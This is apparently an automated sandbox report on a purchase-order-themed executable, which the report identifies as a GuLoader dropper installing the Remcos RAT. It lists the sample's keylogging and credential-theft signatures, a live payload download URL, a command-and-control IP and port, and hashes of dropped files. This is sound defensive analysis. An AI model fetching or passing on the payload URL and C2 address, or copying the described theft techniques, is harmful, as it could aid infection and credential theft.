              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569780 Sample: scan_241205-801_draft_PO.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 28 geoplugin.net 2->28 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 8 other signatures 2->48 8 scan_241205-801_draft_PO.exe 1 21 2->8         started        signatures3 process4 file5 24 C:\Users\user\AppData\Local\...\System.dll, PE32 8->24 dropped 50 Detected unpacking (changes PE section rights) 8->50 52 Tries to steal Mail credentials (via file registry) 8->52 54 Tries to detect virtualization through RDTSC time measurements 8->54 56 Switches to a custom stack to bypass stack traces 8->56 12 scan_241205-801_draft_PO.exe 3 15 8->12         started        signatures6 process7 dnsIp8 30 162.251.122.87, 2404, 49812, 49818 UNREAL-SERVERSUS Canada 12->30 32 geoplugin.net 178.237.33.50, 49819, 80 ATOM86-ASATOM86NL Netherlands 12->32 34 104.168.7.16, 49801, 80 AS-COLOCROSSINGUS United States 12->34 26 C:\ProgramData\remcos\logs.dat, data 12->26 dropped 58 Detected Remcos RAT 12->58 60 Maps a DLL or memory area into another process 12->60 62 Installs a global keyboard hook 12->62 17 scan_241205-801_draft_PO.exe 1 12->17         started        20 scan_241205-801_draft_PO.exe 1 12->20         started        22 scan_241205-801_draft_PO.exe 2 12->22         started        file9 signatures10 process11 signatures12 36 Tries to steal Instant Messenger accounts or passwords 17->36 38 Tries to harvest and steal browser information (history, passwords, etc) 17->38 40 Tries to steal Mail credentials (via file / registry access) 20->40

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              scan_241205-801_draft_PO.exe34%ReversingLabsWin32.Trojan.Guloader
              scan_241205-801_draft_PO.exe22%VirustotalBrowse
              scan_241205-801_draft_PO.exe100%AviraHEUR/AGEN.1331802
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nss24DE.tmp\System.dll3%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://104.168.7.16/WonMNkIofA233.bin0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://www.ebuddy.com0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              http://104.168.7.16/WonMNkIofA233.bin7%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://104.168.7.16/WonMNkIofA233.binfalse
                • 7%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://geoplugin.net/json.gpfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=PbhvB489.tmp.5.drfalse
                    high
                    https://www.office.com/bhvB489.tmp.5.drfalse
                      high
                      http://geoplugin.net/json.gpmiWscan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://www.imvu.comrscan_241205-801_draft_PO.exe, 00000004.00000002.3288654881.00000000341A0000.00000040.10000000.00040000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://geoplugin.net/json.gplscan_241205-801_draft_PO.exe, 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949ebhvB489.tmp.5.drfalse
                            high
                            http://www.imvu.comscan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000007.00000003.2736723800.000000000091D000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000003.2736831556.000000000091D000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.nirsoft.netscan_241205-801_draft_PO.exe, 00000005.00000002.2746788929.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                high
                                https://aefd.nelreports.net/api/report?cat=bingaotakbhvB489.tmp.5.drfalse
                                  high
                                  https://deff.nelreports.net/api/report?cat=msnbhvB489.tmp.5.drfalse
                                    high
                                    http://nsis.sf.net/NSIS_ErrorErrorscan_241205-801_draft_PO.exefalse
                                      high
                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comscan_241205-801_draft_PO.exe, 00000004.00000002.3288654881.00000000341A0000.00000040.10000000.00040000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.google.comscan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        high
                                        https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073bhvB489.tmp.5.drfalse
                                          high
                                          https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AFbhvB489.tmp.5.drfalse
                                            high
                                            https://aefd.nelreports.net/api/report?cat=bingaotbhvB489.tmp.5.drfalse
                                              high
                                              https://maps.windows.com/windows-app-web-linkbhvB489.tmp.5.drfalse
                                                high
                                                https://aefd.nelreports.net/api/report?cat=bingrmsbhvB489.tmp.5.drfalse
                                                  high
                                                  https://www.google.com/accounts/serviceloginscan_241205-801_draft_PO.exefalse
                                                    high
                                                    https://login.yahoo.com/config/loginscan_241205-801_draft_PO.exefalse
                                                      high
                                                      http://www.nirsoft.net/scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        high
                                                        http://www.imvu.comatascan_241205-801_draft_PO.exe, 00000007.00000003.2736723800.000000000091D000.00000004.00000020.00020000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000007.00000003.2736831556.000000000091D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.ebuddy.comscan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.168.7.16
                                                          unknownUnited States
                                                          36352AS-COLOCROSSINGUSfalse
                                                          178.237.33.50
                                                          geoplugin.netNetherlands
                                                          8455ATOM86-ASATOM86NLfalse
                                                          162.251.122.87
                                                          unknownCanada
                                                          64236UNREAL-SERVERSUStrue
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1569780
                                                          Start date and time:2024-12-06 09:57:44 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 7m 31s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:8
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:scan_241205-801_draft_PO.exe
                                                          Detection:MAL
                                                          Classification:mal100.phis.troj.spyw.evad.winEXE@8/19@1/3
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 93%
                                                          • Number of executed functions: 153
                                                          • Number of non-executed functions: 343
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          TimeTypeDescription
                                                          04:00:11API Interceptor133x Sleep call for process: scan_241205-801_draft_PO.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          104.168.7.16INTECH RFQ EN241813.exeGet hashmaliciousRemcosBrowse
                                                          • 104.168.7.16/wvINIwTIDedSXoITN141.bin
                                                          178.237.33.50NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                          • geoplugin.net/json.gp
                                                          1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                          • www.geoplugin.net/json.gp?ip=
                                                          17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          togiveme.docGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          greatnew.docGet hashmaliciousRemcosBrowse
                                                          • geoplugin.net/json.gp
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          geoplugin.netNewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                          • 178.237.33.50
                                                          1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          togiveme.docGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          greatnew.docGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ATOM86-ASATOM86NLNewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                          • 178.237.33.50
                                                          1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                          • 178.237.33.50
                                                          17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          togiveme.docGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          greatnew.docGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          UNREAL-SERVERSUS1g4lfpPUqt.exeGet hashmaliciousGuLoaderBrowse
                                                          • 212.162.149.63
                                                          purchase order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 212.162.149.66
                                                          Juleferien.exeGet hashmaliciousFormBookBrowse
                                                          • 212.162.149.128
                                                          Juleferien.exeGet hashmaliciousFormBookBrowse
                                                          • 212.162.149.128
                                                          RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                          • 162.251.122.86
                                                          PO-RFQ-824-URGENT-SUPPLY.com.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.149.234.209
                                                          PO-RFQ-824-URGENT-SUPPLY.com.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.149.234.209
                                                          PO 09770_MQ 018370_04847_Order.exeGet hashmaliciousRemcosBrowse
                                                          • 162.251.122.86
                                                          Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 212.162.149.63
                                                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                          • 212.162.149.53
                                                          AS-COLOCROSSINGUSTransferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • 192.3.243.136
                                                          LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                          • 192.3.64.152
                                                          maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                          • 172.245.123.3
                                                          Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                          • 107.172.44.175
                                                          bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                          • 107.172.44.175
                                                          nicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                          • 198.46.178.192
                                                          dgreatth.docGet hashmaliciousUnknownBrowse
                                                          • 192.3.95.197
                                                          MdDRzxozMD.xlsxGet hashmaliciousUnknownBrowse
                                                          • 104.168.7.19
                                                          fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                                          • 104.168.7.19
                                                          boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 198.23.133.131
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Local\Temp\nss24DE.tmp\System.dllZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              Readouts.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                RFQ LIST 767655776478637584637865763478634365634444444444444444453.exeGet hashmaliciousGuLoaderBrowse
                                                                  MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                      S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                          Readouts.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                            New listed items 7648767856387547354734567465647568487.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):144
                                                                              Entropy (8bit):3.415943775529228
                                                                              Encrypted:false
                                                                              SSDEEP:3:rhlKlyKxlS8fU5JWRal2Jl+7R0DAlBG45klovDl6v:6lZHfU5YcIeeDAlOWAv
                                                                              MD5:632C677A7DD25BB7A2BFF013B190B036
                                                                              SHA1:16AF0E0200625A8E9E150C1726F7E2CFA0103AFF
                                                                              SHA-256:DA0E9957DDB76F277CFB794B2878BB8C15074EBBB197A06751E8ED7D2429FA58
                                                                              SHA-512:E24E6DC2CD71D1723C0FBD552BE2FF2A68CBD4737F4909B2FA5C375EC2D31014A54BA92D9996EF32F4C64496C630FB50534B2452A9A60BB4652B97A3F8F6BC03
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                              Reputation:low
                                                                              Preview:....[.2.0.2.4./.1.2./.0.6. .0.3.:.5.9.:.3.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):963
                                                                              Entropy (8bit):5.013758486871551
                                                                              Encrypted:false
                                                                              SSDEEP:12:tkluJnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7x:qluNdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                              MD5:A0B25AA7ACE7B58B8A68A3B043CBD1A2
                                                                              SHA1:557B3E91B19FF73B980577D21B0759ACFB694334
                                                                              SHA-256:FF65B6A6CAF43C5830DA137836E99CC4F2DC511116EC72A8F180A17FCCB17526
                                                                              SHA-512:581BF3DEEA3713D383A87024CEA8C3B913FE1138C3D5A9D9D50854EB12DF8D8FFF3239ECB5DC21A24CD337DB7CE4655E6EB373B9524E6BBF160EAB31323CE894
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):319913
                                                                              Entropy (8bit):1.251680217641706
                                                                              Encrypted:false
                                                                              SSDEEP:768:XMVokU9XU2TAW7nXu1q0bubAevzMe4jOsksbDX8CoRRG5RNsdnEoqd1/lOd+bcRg:ygh5n+Do/xEL1sIexdfrz4lUp+
                                                                              MD5:BDA9CBB5FC61D36A238FEFD12958F62E
                                                                              SHA1:7BC3313B428196113C197A30D8B7CB5BF8C05B8A
                                                                              SHA-256:7E4D4F5C9178D96FF91BB8F4DC89872244ECF831E5AD0E5C6CF4BD411E89ADCE
                                                                              SHA-512:95991D21435237853E11E63EE97B7E2084AD5EA901ABE860DCAC88A31514F6690DD749F3BB50632DB3B8C628C20F17658CB41F48ABE2DBF991C8CDC3626A11A6
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.................................j..............i.....=..................................................................................................................................*.....................................|...[9...........y..................................,..............].....................2.....y.......=..(....].........................C..........u........p............................:..........U......................b............................h......:...........I.....................4............@............i........................L....................................................o..'.....................p......[.........(.K...................................................................D..........................m.................................................................G...........................................A...............................................................................................%...................................
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):451562
                                                                              Entropy (8bit):1.2525461197284797
                                                                              Encrypted:false
                                                                              SSDEEP:1536:5fr0wQMArQad8rDGuMYQ0/Qa9ArsL2H5I0Uz7v+ucz:+wFcvdgvp/1e+7Ch
                                                                              MD5:FB22146E36B38923D39A5EE2AB6EEF04
                                                                              SHA1:DAB6F2672D10C6B155A723F5D840E3D327951EEE
                                                                              SHA-256:2871BA9E9A3FB012B925DBFC73ECC4FFCB9A6D9376F6FA2B5AEAF9F024D9B1E4
                                                                              SHA-512:B35B91DED0AC188128768C12136CC6255A9AE442099EAE6CD8D713BCBB96C935B8E1BEFEAE148355DAA462C11FE545D6CF83EBF366CD74430BFD74EAEF5249C8
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..\........................................................+..........}.................................................(........C.o..............D;...................................S..2.......\................................ ......}..........~.................].................................0....l............................G...............................,..........................u.............\.............................................9.......................................................................................................Gf.................}....................G........................@............................R....................................................................5q.......................................................................................................................................................................................E................................................."...................)..........................
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):423567
                                                                              Entropy (8bit):7.0950925247307675
                                                                              Encrypted:false
                                                                              SSDEEP:12288:uI6Oj36yPu0Ja6/33YbcW6da70JW/aEkb:nPuG3+hpO
                                                                              MD5:B36EFA81FB5E6A02B6F2FAA7BF990CBC
                                                                              SHA1:0196CB2DA99488D41D38F4269889277B08CA7865
                                                                              SHA-256:F3A84D87D18C4F2732DA06FAFB9590DF266D124A442182CDBD56F9B574CD621A
                                                                              SHA-512:C756CF7D630028F247DE5C5074262C92D8605A18119CE205BB219B8DBEE0A2F3D4A1993BE9D7E8D257FB4C513BDF70794D75440F07F7CB3CFDBB8CD9229139F1
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:........................V.......UU.8...RR....?..........w..7......:.?..`.}.8...........................................b..............................g.......A..ee...........}}..........`.........Q.....PP.....................__...............,.((............D.....8.......&..f..........^^^........0............D.......cc..............jj..............1......uuu......F....GG........E......................G.................E..............{....v.......M...oo..__...444....11.|..++++.V. .......e.....%.b.....x...q.77.G...<.............l..00............FFFF.X.uuu..............................................................P........7.$...KK.555..............J.?.......................]]............................../........n.o....................EE.............^.J...f..f....r..........i.......................V............................>............#................((.M........U....[.6.............V.....SSS...'......c./.................. ..............%........%.....ll..........................
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):80872
                                                                              Entropy (8bit):4.599021990660873
                                                                              Encrypted:false
                                                                              SSDEEP:1536:S2kbP8KclGU6M2ZnuZyBfB/RFXZxWEeSQ:7UFcR92Iw/RFJneSQ
                                                                              MD5:6509CD2140680BE1E1D0892275FD4D8B
                                                                              SHA1:70B1ED731BE112FDA41C026B4303C49F6F43F07F
                                                                              SHA-256:CA852BC35D75571B052B941A0F9D1EB4CCE8046C4A8AB3D59EF0960C4083AD73
                                                                              SHA-512:4B7933C21046F406E7B821375BD6A26CCF52F9AC004DD4599AF770A3DCAF766377D257965848FAF3FCA8D2229D12B2065FADBB0CAA903EB44C3B719A828077C0
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:....a......f......... ......j........v......Y..................cccc......?...j..............tt.....\.....XX.................DD.)................D..ss...../....B.........3.....[... ....................1..................g...||......:..............F...S..33333........................))..............................3.......................ee.O...........33..###...V.%%.q..$.%%.u.999.....................)..q.........{...F........:::.......z.....7...Q.......H.........e..,......UU..GGG..~.HHH. .....C......s.1..............cc.pp.................!.......h....//////.............[........x............??????????......7.66.....................]]].............TTTTT.......................^..........................vvv..........=...||....)........Z.....ss..............ww........~~~......................11.....QQQ......11....????...............FF.....5.qq.......................S..].J....6......V...........f...6..............................4444................................\...................
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):386836
                                                                              Entropy (8bit):1.2513778021743238
                                                                              Encrypted:false
                                                                              SSDEEP:768:voIK2uqGXqR2QR5ETTH1Ug91Zl+LkfQoNl3WKrZBodLb3MB43uSXui899KBCAqeq:vq6I9FwLb8BVTAquN6zXOYxgc0d
                                                                              MD5:E7EE3636B1B6A1F652676949A296617F
                                                                              SHA1:5E43AB23ABC459FEFB83A051E94409A3241507FF
                                                                              SHA-256:FC9A98EBB7C3C9D2005FC0FD9A8E60C774DD9A20D2BACD3D344949FFDDFE7638
                                                                              SHA-512:3368DA528533DAE0BEE4328D11C20939951078A6F27B51EDE1C9F40BC892F2E3F15F3A83A2EC1A4828EDFBAAFF31B879BCC56A4D30E40633810988BF5DEE01AE
                                                                              Malicious:false
                                                                              Preview:.................:.H...........y..............................I...............................................Z.................................V........................................................................].....1.................u...........................................................%.........................&...........5.u.................Q.=.........................................,....].........E..............................................................R........................................................................J.....................................................................................................A..........................................Z......\..............#*..............................C..............................T.v...................n...................D........j....................................................................Z............._............................"............................................B.......
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:OpenPGP Secret Key
                                                                              Category:dropped
                                                                              Size (bytes):374475
                                                                              Entropy (8bit):1.250557113403427
                                                                              Encrypted:false
                                                                              SSDEEP:768:6IHcBvc7rLF/RdudhUrAMYGOdSgiA6kWS+ADSrJ9XTqY4R5/3PXIxSZ8COsoUzCN:cUxKtUAe+fxwgkVLDWvimwdRD6XZ5xW
                                                                              MD5:6B32D93E2CE9B47BDDE5CE664361D055
                                                                              SHA1:A20A4433745864C4B624D20B828264F9722012AC
                                                                              SHA-256:7D89A290512CDEC472B95D4C59DA82D661C9B24A288915027E1EED78B265AF01
                                                                              SHA-512:5F5F7EF64082E5AA63C181608EA93943A0A4E9838E9D1B704C9B5890C38B53D3578EA2024C63E6CD9C67BF60CEBB9B1F9922CD70E313BEF4A8033271E109530C
                                                                              Malicious:false
                                                                              Preview:......................................-.............y..U....[.......................................................................................!...............................=................H.....=......................................."...../.......................................................C................................M..................e...................................................|.......................w.........0....k...................................................................................J......X.......................................W...............................z..............................................................Y...............................................................................................w.......................................f............)...............................................................(......................................................................N................a.........Z..............
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):412758
                                                                              Entropy (8bit):1.255603772618028
                                                                              Encrypted:false
                                                                              SSDEEP:1536:nRbAnerKsrBOzrm8wPjfSX97sNV7dCZwLX0KOAxu4Syyo:n6Bgy9wdCZoEc4yZ
                                                                              MD5:B64DEEDF2F6937A239A3FABED92E30FE
                                                                              SHA1:5CEC838BEA55AACBEE4CAF80D7884E96338EC513
                                                                              SHA-256:792B23F01E5CB5D6A4FC8AC4C611857DFA8ABC378E00E2B5D10E11CB772188B8
                                                                              SHA-512:ADF5980CAFD3334EDF5C8F0BD37A3C9B5228B45E5CE79C6AA394CAE345311FBD72F68712949085C0450B34769CBA1DE347C6B66A5EC79B92A1D3F3C7CFFF51C2
                                                                              Malicious:false
                                                                              Preview:................................5.................................................f......................,..................a..............................................................V..........................i..................p...#....................................................................:................................^...j..........................................V.............................................................+...................m..M............w.................................$.............................................................................q..........................._..................................&....................................f..=..................7......1....!............................O...............B.........]............................................y...................l.................................J.................................j.................................................................................
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):333635
                                                                              Entropy (8bit):1.2372192579317616
                                                                              Encrypted:false
                                                                              SSDEEP:768:cPqkDi5uSCaNdzVWDl8Yv5+DZ+NXYaPdP4RnI1BZdZKbhdkpA3uXgLcUFLBU4xDZ:MDZGRI/p2zbbNHSHsk
                                                                              MD5:ED7166DA0F5BA4846261BF9747F2C344
                                                                              SHA1:73A3E840A7FEC0FC3F1F18B53CFCCE7B99FAFFB5
                                                                              SHA-256:894B2734E92612CD07BF8BE0D2909AB0190221232B97B0D6A78AC5ABB0B68E7B
                                                                              SHA-512:CA90555D400D92EB408D481F9BF580F4D6120B053E21FCD88017B0F69438571C9B8585227398EE3E1BBF87E1E47BF94EEA5CC45DE6F268899959A9419313DB4C
                                                                              Malicious:false
                                                                              Preview:..F.................R.......................................................................................c.....................................................XY........................................i..............................................................6..........\.................................U....................................}....................................................................................................w....c........2.............................8......o.............................9................................................................d..............c......~..........;..........................................................j...........#.........n................U.-.............................d...................v.....t............................oT...............................z...........................................9.....................................%................`..............................s......................
                                                                              Process:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):52
                                                                              Entropy (8bit):4.725996747697686
